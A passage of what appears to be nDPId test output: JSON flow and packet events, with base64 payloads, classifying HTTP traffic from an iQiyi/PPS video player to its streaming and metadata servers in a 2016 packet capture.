{"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"thread_ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\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\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\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"} 
01353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl84T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353156998,"pkt":"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"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 01021{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"thread_ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 02177{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui5AADgGBqjfGmpCwKhzCABQxTtKZsK5LgIykFAQAB\/uTwAAXABAYzwo9cKPXABAY3wo9cKPXABAY7wo9cKPXAAACQAACKIJAAAyAAAAAAAAABcAAAAAAWQAH\/\/hAB1nZAAfrFYkCgL\/lmoCAgKAAAADAIAAABlHjBjFQAEABWjomvLAAAAAPQgAAAkAAAAAAAAArwATkFblpUgAAAAAFAkAbwgAAAAAAAAAFwEAAFAAAG7\/ZYiCABX\/95xkfm3FH8zfxiVyZItj2+QvcPG\/css\/ZW+K7oKmOXqvyof6+MpsbuBrR3NlYBBVWVRq3WcvPz43KJn6OOq7wUatnW33K69XETXFsUoSgXdN7o0kq4w+hJrrFVm3jhsmgXWVk6qs6hebWuZRXfCylsvlyYQvoo8ujkxwf\/jOPhyl6i\/pTDKbDQZOrGmk9iGos+6hcPjtrVmq5rC28bSpDQb\/l3J+48zXTAIJQ0eBYWXFdgZPT7ei\/1f\/9\/tmNrD8GxGJp2OeeHzKlWg0+2iCixox6opp5+CbF3ew+UCOGdg3U\/5oVyFXyPX7+O0Is6zwfWwGCWJoC6\/zQa49qCQPS9W27Dn4e7vsWHcsLdg3UHzR4Z1JuDFBW7ue0EA3sC0gP\/mqqJuTdXptxBOJRjQ63vSnOV7PtDcJs4A7oWz2JzmEh+VbAw2U5760xCgZf0h+IR4GdMhaD57XDY8NdoZSDUzKAjvVKzHkc\/gdXpR0l6TIGuQcP2n5BFznR2iYeCE\/miwzmIeVW7avmSkaYobdmdMxT40yLpSDo7E8P+71xqJEqUUh6vFl9rz126Cgazh0LClcgaFaNKcZScAJKPrVP1o7kkOIcKwxW2CdOD77SH4zyVYWD9ULtNPIZ77Kl\/LYJQ8L2R419x+V6vNClYH7FDNYQst\/D12fjQ\/m+4yqq8ANYgNFZAXKlC8uKiIfcH\/TAErY7s8c2cJx1lhY3xTKhpLrPcsLU9UsA+Oip34KoUwvW3F5sUP0n2c\/KNlUH5ayGqegy5bryGeYm\/zuaor3RjqVC+afHCqaNQNUM+bdihsi6\/dYDdiuHkznFARXAj+HmRzPclqFdQs0umlOh+4nrXrTgUTsq6Mijt5YgP1vOKM5AtjEldVCDmGr1tU5uzTP\/wOgMtD4fsuENAnY849iMY16mjQC8PBzOazume30AYsAvNe5umLe2Jg9g1q77PVd7s5Hu\/6sIJWIf7my9bXHqgu1vXqQE6ohulSfKXSbeWRxV1zDne\/VQKrMqsiN5thBJ6eGrmP690VCE
ON3vIc3K8eMxOBEG1sH2gt0\/QY+qtme7NqWlgnah6YGN282gbUWFJTA8lul4VGFodu6rBHcO4b\/OZ2Vgodz1eVa7Rvhlz0zeO\/YLtQjl7fwTfVY1piKLJlsXBuH5KXSLNolBVVHCVrAQmkekZvhiLsm\/G4SGTer+1uPrS5m3ZHSe234ovyt+yHtfZCEP\/\/gOVJ5LO7C7uAyroC7rFx6lIcBOyO9mnt4Fi0rv6nmI9Iuf1\/XjKYeJJ3hPNphBZXvUwpvdJUyrMP\/WSQf4xrhUZbkn+wcvgAg5Hq\/N\/ilxIaAfekOtHVgU5VwnYm0lrbpwZtnYoLYol2itsi\/Tiny8B2OHcGdfUzCAOCON\/0+\/ipakxXBeRa7CLgs5mjI+rNnEby8whMLuruKRetpD4LDPViHWG\/OwHoZ14S6hpwBDqQ07xh3U7DjW9xs4GqS"} 02162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1467353157142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353157142,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUui9AADgGBqffGmpCwKhzCABQxTtKZselLgIykFAQAB\/aLgAAopnkFb6w\/Gf9wcd\/TnuexQBjLwWa0uCe9TPr4qE3jsphraOf\/lM4Hhi9NJILTNUPpkUh0lJVsTBg0+IryxSW3IwYySV6wkzB0\/tYDwbO6SOx\/W5mmrffIH5hc9hR+iJYkdxSMJyhs5tL+JX3Z4urkWLC21HQmnbWWhKwwr3IOESy8lC4QLT5bzgZZwV6aylc3BKRGmkWqvo3gveBLOrAMA4JoqHhbMBYA7GEB3n5XVRePARG35OUMCE\/8TDQo0+dLC24GKANopCzYZkvfPVaY0dRDrv50emXg1Cs9WSfVu50aDF7YYVdx5mx545GrUAMEsqIjDQ\/4DCox7xS+Ws\/dwFhUTJ0P8Dx\/xK2lp12JPYf\/zG6tdTYMt3AacBTBvLHFFde\/reBoQaTbZB\/vJdywKaKtIzwqCOs4Q9YPbL8+Pq1VE1FdEBeuONtnWPx9wNuAvH6U\/JENWXsD\/bsjom76483YU\/XZIQUgj30cOEgQwuDamiBln+90aAngeN2nOL6ntmgjdG66Xp5PKfwQlwuGdvacgApEFyIvnfxUhm77eXRcDexRzOKtayXJEIXZt52rm2WbDXx+l2L+n6mDI5HPlSGKuvP84rwmMwhT7yEvzQKbivh5sn9I8EjZx6KaukURUZTKe54jHmLC3Jmf2BKkUKfD+otim\/knbUQxDjsPRmRG1Nf5oF86K6KEl\/nFEI9A5kcjFcko+VuDqw9SWzSXgKad5EYc4r+hlUwt3uzj59viQUjCCWYguaIGZ8C5ZjdSExE6IsY1BXoMFqHoRzfJaDg6uSsFAjJS92cQgN0nWwTaQFWx1m2slB35iQ1wft22PbPDl49icFcTFpAz2oY5Pp3lfvj5IUJyUTHt3u8v74exA53o9ooOtbqs2j42om\/zaB3iyhBCsOikAKzbr0K6CxGSwBAWdloUe96BLdalzPNcqhIK0c0YJvH4tBdmDh+5ufseEBw7BGI2ipV6yVNpFO0kDqCajN7YsN05JDg13dAXzY2SAQ5QfKni3cz7N9WhYMt7COKUvI+C0iwIaEB32bniucRrN4HsPO11eCbW
